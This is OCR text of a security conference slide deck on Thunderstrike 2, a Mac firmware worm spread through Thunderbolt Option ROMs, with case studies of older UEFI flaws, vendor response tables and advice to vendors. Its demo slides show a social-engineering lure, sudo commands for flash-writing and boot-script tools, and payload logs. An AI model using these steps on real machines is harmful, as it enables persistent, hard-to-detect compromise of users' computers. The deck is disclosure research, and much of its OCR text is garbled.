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LEGBACORE

® We do digital voodo at LegbaCore

® Independent as of January 2015

® Focused on firmware and
peripheral firmware security.




Rafal WojtcZuk, Corey Kallenberg: Attacks on UEFI security (31C3)

+

Trammell Hudson: Thunderstrike (3 1C3)

and once that is done we have owned the system

o



UEF| vulnerabilities are often
shared between different
systems.



Demo time!
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Download a cute cat screensaver!

Then open Terminal.app and run:

bash ~/Downloads/install

| cornmand W option




oers newgrp
sudo whoami

root ' '

Root exploit

Remote code can escalate to root




ALLLIG mOthe rboard Boot ROM
00001000

ra
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Z
A s
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e i":*i'

crc 4ao6ft7b@3 s IR
free space 0013a150 tt‘
payload: dest 0013a150, 2fe bytes  — -
copying region... f if'fj}3;¥ ,
crc 4a6f7b@3 4a6f7b03 L
sum /7611 7611

computed crc: 59911775
crc 59911775 59911775
sum 7611 c778

spiflash_write_enable: bios_cntl=1
spiflash_write_enable: new_bios_cntl=1
spiflash_read: offset 002ca000

SIS Unlock BIOS and write to flash
spiflash_read: offSes

£ - Append to FVH and update CRC
spiflash_write: 00198 B and update

| |
m,l
| §
-




) ,’"-an 'set 002cab0o
write 002ca000 + 1000 bytes
ad: offset 00190000
splflash write: 00190000 + 1000@ bytes
k%% Installing on Thunderbolt Optlon ROM

Early CRC fc41c8f3 (good) ‘
Header CRC d@7f5elb (good) R .
Header sum 59 (good) _ .5?
MAC: 0c:4d:e9:00:97:12 “

Option ROM address Ox25fc length ©0x1204 bytes ......
Read @x1200 bytes

PXE CRC 24d41979

--=--_New image

Early CRC fc41c8f3 (good)
Header CRC d@7f5elb (good)
Header sum 59 (good)

MAC: 0c:4d:e9:a0:973 : .
Option ROM address @x Write to Ophon ROM

Search PCle bus for removable devices

---- writing PXE opii
ﬁ}@?gtc: 0002d0 / 001204



®spiflash_read: offset 002ca@0@
spiflash_write: 002ca00@ + 1000 bytes
spiflash_read: offset 00190000
spiflash_write: 00190000 + 1000 bytes
*#%% Tnstalling on Thunderbolt Option ROM
Early CRC fc41c8f3 (good)
Header CRC 417958e2 (good)
® _Header sum 5c (good)

£ MAC: 98:5a:eb:cb:c6:79

.~ Option ROM address @x25fc length @x604 bytes

-~ Read 0x1200@ bytes
'PXE CRC 24d4f979

4 -=-== new image
Early CRC fc41c8f3 (good)
Header CRC d30f6d5e (good)
Header sum 59 (good)
MAC: 98:5a:eb:cb6:¢c6:79
Option ROM address @x25fc length @x1204 bytes

DONIIAGES ____ \,i+ing PXE option romicrc to @x25fc
|036?8: 0010Zc / 001204

Then open Te

'ibash ~/Downloads/install

anﬂ -n--

| @ ¢ I s % A
l 2 § s 4 f 5 6 delete

Thunderbolt adapter is now infected
Option ROM contains Thunderstrike 2

'l '1 alt gg [ | 3% ail ‘ A
'I " | | | | \
. | | \
b {comrol {opﬂon | command | | command B opfion - \ v -
5 A\ A




s**+ ERROR UIFiagPickerRestoreState Mo stote found for flagpicker

s+*4 ERROR ArchiveViewCregteWithOptions ArchiveCopyPNGImage failed for file: pre
ferences_good_samaritan_message_ribbon.png

e4eé ERROR ArchiveViewCreateWithOptions ArchiveCopyPNGImage foiled for file: log
inui_bootprogressbar .png

Thunderstrike 2 is installed in the motherboard boot ROM

Starting 0SX in |

| | ‘ ‘ % l N | & * | } | - \ + ‘\
| s S [ 6 e L 8 | O | - | = \ detete
L g \ A ‘l A

By Y -y . ¥ . ¢ .Y . % _§ .0 LYW

Thunderstrike 2 executed from boot tlash

Runs before kernel load, can backdoor OS X ig

.M—-D-




¥#%¥* ERROR UIFlagPickerRestoreState No state found for flagpicker
##%** ERROR ArchiveViewCreateWithOptions ArchiveCopyPNGImage failed for file: pre

ferences_good_samaritan_message_ribbon.png .
##%** ERROR ArchiveViewCreateWithOptions ArchiveCopyPNGImage failed for file: log

inui_bootprogressbar.png

root device uuid is '7A18B(97-4624-3FE9-A158-41D2FE591202"

By | 3
L1 "N\ /) "
TR T LR T TR I U
. O )
BN ' 1//-D /17
A 1.0 11, .\ Ny ]

Option ROM installer

**%** payload 0x00001CB8 Ltes copied to 7AFD7600
00: 663CEC8353565755

08: FOOSFED1F80405C7

10: @1CEE87AFD75D0AL 4

18: 00001C92C3810000
**%** entry point Ox7AFD74FC=0000FFE9

#¥%¥* Keystroke )
USRS Option ROM runs before kernel

Hooks S3 resume script, boots normally
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CPU powers down A

All flash protection bits are reset
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Thunderstrike 2 written to flash

Boot flash is now infected
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ofiboot loaded from device: Acpi(PNPOAS3, 0)/Pcl(1CI14)/Pal(919)/SATACD, 0)/MD(Part
2,519253B8A65-0D87 -4TOF -QABE -AMDZ2DAI73AE)

boot file path: \Systes\lLibrary\CoreServices\boot .efi

«.Loading kernel cache file 'System\Library\Caches\com.apple, kext.coches\Startup

Thundérstrike 2 is installed in the motherboard boot ROM

Storting OSX in 9 8 ||

» 3 J

SNHBHEHBaNnRn
: ' | A e | ? ) | S

delate
I W W Y N NN NI R O IO O I RO E—TiE———35r—

Thenderstrike 2 executed from boot flas§

This laptop is now infected




Infected adapter infects further systems

Can cross air gap security perimeters



UEFI vulnerabilities are shared
between many different
systems.



EFl vs UEF

® [ntel started EFl project in late 90s to replace BIOS.
® Apple forked from Intel EFI 1.x in 200x
® [ntel created UEFI Forum in 2005 and deprecated EFI |.10

® Still millions of lines of common code

® AMI/Phoenix/Insyde/etc fork UEFI EDK2 tree, freeze at the
current head, add “value” and sell to packaged firmware.

® Some things are backported, but most vendors never
git pull

21



Function name

| | sub_79E2124
" | sub_79E2126
sub_79E2128
sub_79E212E
sub_79E2130
sub_79E2132
sub_79E2132
sub_79E2133
sub_79E2134
sub_79E2135
sub_79E2136
sub_79E2136
sub_79€2137
sub_79E2138
CopyMem
sub_79E2162
sub_79E2165
SetMem

sub_79E2171
e th 70;717u:J
>

]

i

R R

LJ |
7]
7]
f]
7]
(7]

[EDgED

LA™

e

[~

-~

Line 50 of 245
gaGr. O & X

%é%: .

W=

nov
call
mov
call
mov
mov
call
test
jz

loc_79E2B672:

rcx, [r15
CoreRe

rcx, [r15¥
CoreFreePool
cs:qword 79E315D8, r12
rcx, ri14

sub_79E28F12

rsi, rsi

short loc 79E2B6B9

oh]

Wl e =

’
short loc_79E2B6B9

v v

bl i =

r14, [r15+08B6h]
[rdi], r14
r14, [r15+0B88h]
[rsi], r14

short loc_79E2B6DO

loc_79E2B6B9:
mov rcx, [r15:48B88h]
call CoreFr
mov quword pt
v

Yy

il e =

loc_79E2
mov

test

js

B6DO:

r14, [r15+0A8h]
ri4, ri4

short loc 79E2B6ES3

Disk: 15GB

4

100.00% |(215,1648) |(118,170) |0000AE7S |0000000079E2B679: CoreStartiImage+l59

MacBookAir4,1

AU:

ction name

f | sub_1800002C0
| sub_18000030C

QAN

f | sub_180000358

| sub_18000045C
" | sub_1800005590
f| sub_
| sub_180000704

1 | sub_180000758
| sub_1800007E8

" | sub_

o~

0620

NN OT

f | sub_1800008E8
| sub_180000900
| sub_18000092C

"| sub 180000A40

1

e A\Aﬁ.

) =

loc_18001EBD/: ’

supposed to be Image->Tpl

rbx+LOADED _IMAGE_PRIVATE_DATA.Tpl]

opeTpl

¥bx+LOADED IMAGE_PRIVATE DATA.JumpContext] ;

CoreFreePool
rcx, r12 s K12 =
cs:mCurrentimage, r13

CoreConnectHandlesByKey
rsi, rsi S
short loc 18001EC1E

ExitData

'J]p!ulnlw[ o be

HandleDatabaseKey

Image

supposed to

A 4

. 4 . 4

ExitDataSize

‘Jip[nr,w|| to be

rdi, rdi s rdi =
short loc_ 18801ECA1E

Image

4

s

osed to be Image->ExitDataSize
osed to be Image->ExitData

Sratus

loc_18001EC1E:
mov

Tmagqe=->Status

quord ptr [¥

; supposed to be

rcx, [rbx+08C

Coh], ©

suppose

Y

Y

idle Down

0B 6h ]

00000000006h

18001ECAHF

; Status = Image->Status

100.00%

Disk:

(634,1707) |(2,107) |0001EBDE (000000018001=ZBDE:

15GB

CoreStartImage+l3A

ASUS BT1AH

|




Shared vulnerabilities

® Shared EFI/UEFI reference implementation leads to shared
vulnerabilities.

® |ust because Intel fixed it in EDK2 doesn’t mean all vendors
have updated their code.

® Not all hardware protections are used by all vendors.

® Decades of legacy hardware, even in UEFI.

23



Vulnerability Case Studies

Thunderstrike 2 takes advantage of four older, previously
disclosed vulnerabilities:

|.Incorrect BIOS _CTNL / Speed Racer (2014, VU#766164)
2.Darth Venamis (2014,VU#9761 32)

3.Snorlax (2013 VU#577140) and PrinceHarming (2015)
4.Unsigned Option ROMs (2007, 2012)

24



Case study |:Speed Racer

25



i n'tel . (| CH datash eet, | 999) LPC Interface Bridge Registers (D31:F0)

8.1.12 BIOS_CNTL (LPC I/F—D31:F0)

Offset Address: 4E-4Fh Attribute: R/W

Default Value: 0000hn Size: 16 bits

Lockable: No Power Well: Core
Bit Description

15:2 Reserved.

BIOS Lock Enable (BLE). Once set, this bit can only be cleared by a PCIRSTH#.

1 1 = Setting the BIOSWE bit will cause SMis.
0 = Setting the BIOSWE will not cause SMis.

BIOS Write Enable (BIOSWE). When this bit is written from a ‘0’ to a ‘1’ and BIOS lock Enable
(BLE) is also set, an SMI# is generated. This ensures that only SMM code can update BIOS.

1 = Access to the BIOS space is enabled for both read and write cycles.
0 = Only read cycles result in LPC |I/F cycles.




Case study |:Speed Racer

VU #7661 64

O

BIOS CNTL Race 3/4

BIOS_CNTL

! DICD ® Disclosed to Intel and
TNV aQ new dawn
Thread 1 (core #1) oLe=t \

CERT/CC in May 2014

Flash Write ' ® Publicly disclosed at 31C3
— (Dec 2014)

* Although core 2 will also enter SMM, it does not
happen instantaneously.

* Core 2 has a small window in which to attempt |
flash write operations ="

27



intel,

(PC H data S h eet’ 2004) LPC Interface Bridge Registers (D31:F0)

12.1.33 BIOS_CNTL—BIOS Control Register
(LPCI/F—D31:F0)

Offset Address: DCh Attribute: R/WLO, R/W, RO
Default Value: 20h Size: 8 bits
Lockable: No Power Well: Core
Bit Description
7:6 Reserved
5 SMM BIOS Write Protect Disable (SMM_BWP)—R/WL.
This bit set defines when the BIOS region can be written by the host.
0 = BIOS region SMM protection is disabled. The BIOS Region is writable regardless if processors
are in SMM or not. (Set this field to 0 for legacy behavior).
1 = BIOS region SMM protection is enabled. The BIOS Region is not writable unless all processors
are in SMM and BIOS Write Enable (BIOSWE) is set to '1".
1 BIOS Lock Enable (BLE)—R/WLO.
0 = Transition of BIOSWE from 0’ to ‘1’ will not cause an SMI to be asserted.
1 = Enables setting the BIOSWE bit to cause SMIs and locks SMM_BWP. Once set, this bit can only
be cleared by a PLTRST#.
0 BIOS Write Enable (BIOSWE)—R/W.

0 = Only read cycles result in Firmware Hub or SPI I/F cycles.
= Access to the BIOS space is enabled for both read and write cycles. When this bit is written
from a 0 to a 1 and BIOS Lock Enable (BLE) is also set, an SMI# is generated. This ensures that
only SMI code can update BIOS.




Case stud

Recommended:
BIOS CNTL=0x1A

BIOS CNTL.BLE bit

BIOS_CNTL.
SMM_BWP bit

Protected
Range Registers

. UEFITool says
Firmware

"padding”?

S 3
Flash S S
Addr. oo ox
. i

| : Speed Racer

OS-resident Attacker

Code & Stuff EFI Variables Code & Stuff

610000
632000

7FFFFF

29



Case study |:Speed Racer

Vendor Information (Learn More) (Picture retrieved Jul. 27t 2015)

Vendor Status Date Notified Date Updated
American Megatrends Incorporated (AMI) Affected 12 Se 29 Dec 2014
Lenovo Affected 12 Sep 201« 23 Jul 2015
Phoenix Technologies Ltd. Affected 12 Sep 201 17 Dec 2014
Apple Inc. MNot Affected 16 Dec 2014
Dell Computer Corporation, Inc. Mot Affected 12 Sep 201 21 Jan 2015
IEM Corporation Mot Affected 12 Sep 201« 16 Dec 2014
Insyde Software Corporation MNot Affected 12 Sep 201 03 Feb 2015
Intel Corporation MNot Affected 12 Sep 201 06 Jan 2015
AsusTek Computer Inc. Unknown | 2 Sep 201« 12 Sep 2014
Gateway LInknown 12 Son 201 12 Son 2014
Hewlett-Packard Company Unknown

Sony Corporation Unknown

Toshiba Linknown



Case study |:Speed Racer

® BIOS CNTL=0x0008 means no
flash protection other than PRR!

.| bh2015 — mbp2014:/Volumes/hudson/efi/bh2015 — bash — 382

mbp2014: sudo ./check-flockdn

BIOS_CNTL: 0008/ (e00f80dc) ® Apple doesn’t use BIOS_CNTL

"LOCKDN:  f@0c (fed1fge4) lock enable or SMM.

PRO : OO0OEEOOO (fedlf870)

PR1: 80010000 (fedl1f874) ® So they aren't technically
OR? - 86010190 (fed1f878) vulnerable to Speed Racer...
o e 9fff0632 (fedlf87c)

® Attacker can write anywhere not
protected by PRR.

31



Case study |:Speed Racer

MacMini/,1 OS-resident Attacker
BIOS CNTL=0x08

BIOS _CNTL.BLE
bit is not set!

BIOS CNTL.SMM_BWP
bit is not set!

Protected
Range Registers

UEFITool says .

Firmware "vadding"? Code & Stuff EFIl Variables Code & Stuff
o o o o ™
Flash = = S S ™
Addr. & & = o L
— — O O ™~

32



Case study 2: Darth Venamis
VU#976132



Case study 2: Darth Venamis

® Sometimes called the “Dark |Jedi”
attack.

® Named by Rafal Wojtczuk because
Darth Plagueis defated Darth
Venamis and put him into a death-
sleep/coma to study midi-chlorians

34



Case study 2: Darth Venamis
VU#976132

® “Suspend to RAM"” sleep
(5105 Lock Enable (BLE) — AWL0 i = resets all flash and SMM
] l‘.“" “‘::‘- Eﬂ:1<"~.‘.'.‘ Wt Lo cause SMis. Once set, this bit can only be PI"OteCtiOn,

[ Flash onfiguration Lock-Down (l LOCKDN)

ogram Registers that are locked down by thes FLOCKDN ¢
setto 1, thust

sl o utuiel abpivri birop i Gk DICD ® Untrusted code can be
=h kbl injected into S3 resume

15

A reset in which the host platform is reset and PLTRST# is asserted is called a Host

Reset or Host Partition Reset. Depending on the trigger, a host reset may also result in “bootsc I"ipt”
* The bits that lock down SMM and the
firmware are cleared during a reset ® Disclosed to CERT/CC and
* “sleep”/"suspend” are typically implemented UEF| Security Response Team

as an ACPIS3 sleep, which results in these in Sept 2014
lockdown bits being cleared

 S3sleep =dark jedi coma

® Publicly disclosed at 31C3 in
7\ Dec 2014 [6][8]

31c3: Attacks on UEFI security, inspired by Darth Venamis's misery and Speed Racer Rafal Wojtczuk and Corey Kallenberg

35



Intel® Platform Innovation Framework
for EFI

Boot Script Specification

Normal Boot»

\ 4

| Boot Script |
| Table in ACPI |
' NVS |

A

Execute

PEI(S3 aware Bg‘gla"”pt
—» SEC —p RENLID [DRieg ———» | restore l;(;(E OS waking Vector > L
S3 Resume PEI phase
configuration) conzrg]?1§:tnon
#define EFI BOOT SCRIPT IO WRITE OPCODE 0x00 F
#define EFI BOOT " SCRIPT IO . READ WRITE . OPCODE 0x01
#define EFI BOOT SCRIPT MEM WRITE OPCODE 0x02
#define EFI BOOT SCRIPT MEM READ WRITE _ OPCODE 0x03 ,
#define EFI BOOT SCRIPT PCI CONFIG WRITE OPCODE 0x04 | Version 0.91
#define EFI BOOT SCRIPT PCI CONFIG READ WRITE ~ OPCODE 0x05 April 1, 2004
#define EFI BOOT SCRIPT SMBUS EXECUTE OPCODE 0x06
#define EFI BOOT SCRIPT STALL OPCODE 0x07

#define |[EFI BOOT SCRIPT DISPATCH OPCODE 0x08




BIOS CNTL.BLE bit

BIOS CNTL.

SMM_BWP bit

Protected

Range Registers

Firmware

Flash
Addr.

Case study 2: Darth Venamis

OS-resident Attacker

UEFITool says

"vadding"? Code & Stuff EFI Variables Code & Stuff

18E000
190000
610000
632000
7FFFFF

15
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Case study 2: Darth Venamis

® In this case CERT didn’t list which vendors they have contacted.

® |t turns out that Apple was not contacted by CERT, but was informed by USRT.

Vendor Information (Learn More)

Vendor Status Date Notified Date Updated
American Megatrends Incorporated (AMI) Affected 15 Sep 2014 10 Dec 2014
Dell Computer Corporation, Inc. Affected 15 Sep 2014 22 Jan 2015
Insyde Software Corporation Affected - 03 Feb 2015
Intel Corporation Affected 15 Sep 2014 29 Dec 2014
Lenovo Affected - 21 Jan 2015

Phoenix Technologies Ltd. Affected 06 Oct 2014 19 Dec 2014




Case study 2: Darth Venamis

® |t turns out that many Macbooks
are vulnerable!

® This is a software-only attack via
53 resume script.

® Can escalate from root access to
firmware writing.

Physical access is
no longer required!

39



- A

mbp2014:~/efi/bh2015: sudo ./check—flockdn

FLOCKDN: f008

PRO: 00000000 / NOrma”yl the bOOt ﬂaSh
f e is protected by PRR and

Q@

2l 86010190

PR3 oOfff0632

mbp2014:~/efi/bh2015: sudo ./install-bootscript unlock-32.bin FLOCKDN IOCkS them

000000 7ad3fO00

00000239 |IDISPATCH: EntryPoint=000000007afd7600

0000029c DISPATCH: EntryPoint=000000007afd74fc MOV $FOO8 ’ (FLOCKDN)

Hat  *Crtorabort . . .
Written into bootscript

Writing 14 bytes to Ox7afde00 .

P000R00: 66 c7 05 04 f8 d1 fe 08 fO e9 ee fe ff ff e before PRR are set, locking

mbp2014:~/efi/bh2015: pmset sleepnow

Sleeping now. .. them as all zeros.

mbp2014:~/efi/bh2015: sudo ./check-flockdn
FLOCKDN: f00c

i et N After Sleep, PRR dalfe Nno
PRI 00000000

PR2: 00000000 Ionger set, entire boot flash
PR3: OEOOOEO0O . .

mbp2014:~/efi/bh2015: echo 'Hello, world!' | \ 1S read/erte.

> sudo ./spiflash --verbose -w - --offset Ox7fe000

spiflash_write_enable: bios_cntl=9 ] )
spiflash_write_enable: new_bios_cntl=9 h BlOS Wr|te-enab|ed W|th

spiflash: writing to 007fe000: Oxe bytes

spiflash_read: offset 007fe000 NO nEEd fOr Sp@@d Racer,
spiflash_write: 007fef00 + 1000 bytes ]
mbp2014:~/efi/bh2015: sudo ./spiflash -r - —-offset 0x7fe®@00 -n 16 | xxd -g 1 Flash re-written.

0000000 : 48 65 6C 6C 6Ff 2C 20 77 6f 72 6C 64 21 P2 ff ff| Hello, world!...
mbp2014:~/efi/bh2015: I

40




Case study 3: Prince Harming

Harming?

Know the signs of abuse.
- Know what o do.

® Originally “Snorlax”,
VU#577140 from 2013

® Rediscovered in 2015 and
renamed.

ﬂ Katie Moussouris

Nice one @osxreverser | Nobody wants to be
awoken by a poisoned kiss from

#PrinceHarming ;)

3 9 SER1RER T B!
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Reverse Engmeermg Mac OS X

Reverse Engineering and Security for fun and pleasure!

N .\
N\ A
. .
< \‘.‘
- .
. A
N
9 ,
R S

About Archives Books Crackmes Gdbinit Github Links Papers Patches Tags Tools Q

he Empire Strikes Back Apple — how your Mac firmware security
1s completely broken

O May 29,2015 @ Security

If you are a rootkits fan the latest Chaos Communication Congress (CCC) in 2014 brought us two excellent presentations, Thunderstrike by
Trammell Hudson and Attacks on UEFI security, inspired by Darth Venami’s misery and Speed Racer by Rafal Wojtczuk and Corey Kallenberg.

The first one was related to the possibility to attack EFI from a Thunderbolt device, and the second had a very interesting vulnerability
regarding the UEFI boot script table. The greatest thing about the second vulnerability is that it allows to unlock flash protections by modifying

fheboot seript executedafteraS3suspendresumeycle: «m\well, Apple's S3 suspend-resume implementation is
so f*cked up that they will leave the flash protections
unlocked after a suspend-resume cycle. | ?#S&H#%& | #
%&#t7 - @osxreverser




Why didn’t we see Prince Harming!?

w Trammell Hudson™ . .
® Ve had been testing with a

mig59 @osxreverser MBP10,1 HM77 BO2 MBPI1,2 (HM87 chipset)
is buggy, but 11,2 HM87 BO7 correctly that properly set PRR
restores PRR. Time to diff b

-

- 3 Ta :)‘f M r > 4
. Q15a0 L€, AV W jLe al

ootscripts... coming out of S3 sleep.

® (@osxreverser was testing a
MBPI10,l (HM77 chipset)

which didn’t set PRR and
was vulnerable.

® Apple or Intel silently fixed
this vulnerability, but never
back ported the fix to older
systems!

_Jo) | Jebe] |:BE ® Oops! Accidental Zero-day!
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iPhone Watch iPad iTunes Support

Mac EFI Security Update 2015-001

e EFI
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5
Impact: A malicious application with root privileges may be able to modify EFI flash memory

Description: An insufficient locking issue existed with EFIl flash when resuming from sleep states. T

Issue was addressed through improved locking.

CVE-ID

CVE-2015-3692 : Trammell Hudson of Two Sigma Investments, Xeno Kovah and Corey Kallenberg of
LegbaCore LLC, Pedro Vilaca

Xeno Kovah

Here's the 24 updated models. Basically
says "stuff since 2011" (which is why it's not
just #PrinceHarming fixed)

IM121_0047_21B_LOCKED.scap
IM131_010A_B08_LOCKED.scap
IM141_0118_B11_LOCKED.scap
IM142_0118_B11_LOCKED.scap
IM143_0118_B11_LOCKED.scap
IM144_0179_B10_LOCKED.scap
IM151_0207_B03_LOCKED.scap
MB81_0164_B06_LOCKED.fd
MBA41_0077_B12_LOCKED.scap
MBAS51_00EF_BO03_LOCKED.scap
MBAG61_0099_B19_LOCKED.scap
MBA71_0166_B06_LOCKED.fd
MBP81_0047_2AB_LOCKED.scap
MBPS1_00D3_B0OB_LOCKED.scap
MBP101_00EE_B09_LOCKED.scap
MBP102_0106_B08_LOCKED.scap
MBP111_0138_B15_LOCKED.scap
MBP112_0138_B15_LOCKED.scap
MBP114_0172_B04_LOCKED.fd
MBP121_0167_B07_LOCKED.fd
MM51_0077_B12_LOCKED.scap
MM61_0106_B08_LOCKED.scap
MM71_0220_B03_LOCKED.scap
MP61_0116_B15_LOCKED.scap




Issues with Apple’s EFl Security
Update 2015-00|

® | ocks PRR/FLOCKDN in PEIl before S3 bootscript.
® This prevents writing to the boot flash shown in the demo.
® But...
® BIOS CNTL bits are still unlocked! (can brick the system)
® 53 boot script is still unprotected! (can do stuff)
® TSEGMB is unlocked (can DMA into SMRAM)
® Another silent fix?
® New MacBook (USB-C) protects S3 boot script
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Case study 4: Option ROMs

Hacking the Extensible
Firmware Interface

(BlackHat 2007)

Inhn Heseman  Director of Researnrh N <
DE MYSTERIIS DOM JOBSIVS:
MAC EFI ROOTKITS
(BlackHat 2012) -~

@ BLACK HAT USA
JULY 2012

A

assurancce

Please complete the speaker feedback surveys
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Case study 4: Option ROMs

Element #3: Support from IBV, IHV & ISV Partners

« OEM-ACTION—- System ROM will need to contain UEFI ¢ |'jte! added Option ROM
drivers for all onboard devices (and no legacy drivers) signing to UEFI 2.3 and

- | IHV-ACTION—> Expansion cards will need Signed UEFI required it for Secure Boot.
drivers

. .
. ISV-ACTION—> Pre-boot software tools, for example Apple is still on older EF

. . . d still unconditionall
| k, will an /
bootable recovery disk, will need to be Signed executes Option ROM:s.

® Despite Heasman’s talk in

2007, Snare’s demo in 2012
and Thunderstrike in 20 14!

® Needs an architectural fix.

\

IDF2011

INTEL DEVELOPER FORUM




Case study 4: Option ROMs

dll S qr =d

—— e

— I rv~——~—-—4 et vv'

<

Virulent: aftec f»

< ATY +=i\7 <1l
Rnemotely Installat

(From the Thunderstrike talk at 31c3)




Case study 4: Option ROMs

0

mbp2014:~/efi/bh2015f sudo ./b57tool --pxe hello.rom
Early CRC fc41c8f3 (Summmms
Header CRC 3c702369 (good)
s Header sum dc (good)
' pO T orina WA CavE/max). Meg g0tabods o s MAC: 98:5a:eb:c6:c6:79
8 57762:A0 68:80:8 » 2 ACBO 11 64dks 64k 4887 «FE 57762-a1.18 HMp,auto " Opt_] on ROM addreSS OXQSfC -Leng_th OX404 byteS

B 57762:A8 68:00:8 Ex1 25¢ 11 64ks § 'CBF46D2FE 57762-a1.18 WMp,auto LI Read Ox400 bytes

Updating PCI ROM (type 3) head h Ug W = Bxi4ed Device 1D = Bx1682 ' PXE CRC el107 fSC

Updating PXE EFI (length = 27149

Programning 27148 bytes to NURAM OF '8Z5FC o
Programning. .. 27148 ——== nNnew jmage

Updating Directory...

Content length = 88886284 Early CRC fc41c8f3 (good)

NURAM offset = 8888257

R ccrent WRAE ' Header CRC 3c702369 (good)
Totally 1 card(s) hafl 5 progranned. i Header sum dc (good)
£:\B57D1AG = MAC: 98:5a:eb:c6:c6:79
— ! Option ROM address 0x25fc length 0x404 bytes
=—=——"Writing PXE option romrcrc tolOx25fc
0029fc: 000400 / 000404
-—--—- writing header
0000fc: 0000fc / 000100
-—-- verifty
Early CRC fc41c8f3 (good)

Rebooting to DOS Header CRC 3c702369 (good)

Header sum dc (good)

is NOt reqUired, MAC: 98:5a:eb:c6:c6:79

Option ROM address 0x25fc length 0x404 bytes

jUSt rOOt acceSS! mbp2014:~/efi/bh2015:
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Case study 4: Option ROMs

3

Get Remote Root Shell
(left as an exercise to the reader[19])

Install the whitelisted
DirectHW.kext and

map the PCle space.

,/»

Y

Write code into the ROM
that will execute in the
context of the BIOS at
next boot

(Not just Thunderbolt - WiFi / GPU / SATA have them, too!)
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UEF| vulnerabilities are often
shared between different
systems.



Old bugs, new platforms

Private disclosure

Vul bilit Stat OSX
eraTy Public disclosure e
Snorlax/PrinceHarming August 2013
VU #577140 July 2015 / May 2015 Patched June 2015
Darth Venamis Sept 2014 .
VU #97613) Dec 2014 Partial Patch June 2015
SpeedRacer/BIOS CTNL Dec 2013
VU #7661 64 Aug 2014
King’s Gambit Dec 2013
VU #552286 Aug 2014 (See HITB-GSEC 2015)
The Sicilian ~May 2013
VU #255726 Sep 2013
Setup UEFI Variable June 2013
VU #758382 Mar 20| 4 Not vulnerable
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What can vendors do!

® [est older vulnerabilities against your systems

® Don’t silently fix vulnerabilities

® Use the locks provided by the platform:
e BIOS CNTL.{BIOSWE,BLE,SMM_BWP}, TSEGMB, PRR, etc
® Chipsec can help validate platform configuration

® SMM Lockbox to help protect S3 resume script

® [ntel Boot Guard on newer CPUs

® Better security around Option ROMs
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What can the audience do!?

® Start doing firmware forensics!
® | egbaCore can help
® Thunderbolt OptionROM tool: (to be announced soon)

® OptionROM integrity checker: https://github.com/legbacore/

OPEN
SECURITY
TRAINING

INFO

Go check out OpenSecurity Training.info for the free classes from Corey and Xeno on
x86 assembly & architecture, binary executable formats, stealth malware, and exploits.
Then go forth and do cool research for us to read about!
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Thanks for attending our talk!

https://trmm.net/ Thunderstrike 2

https://legbacore.com/Research.html

@gqrs / hudson@trmm.net

(@xenokovah / xeno@legbacore.com

@coreykal / corey@legbacore.com

Please fill out evaluation forms!
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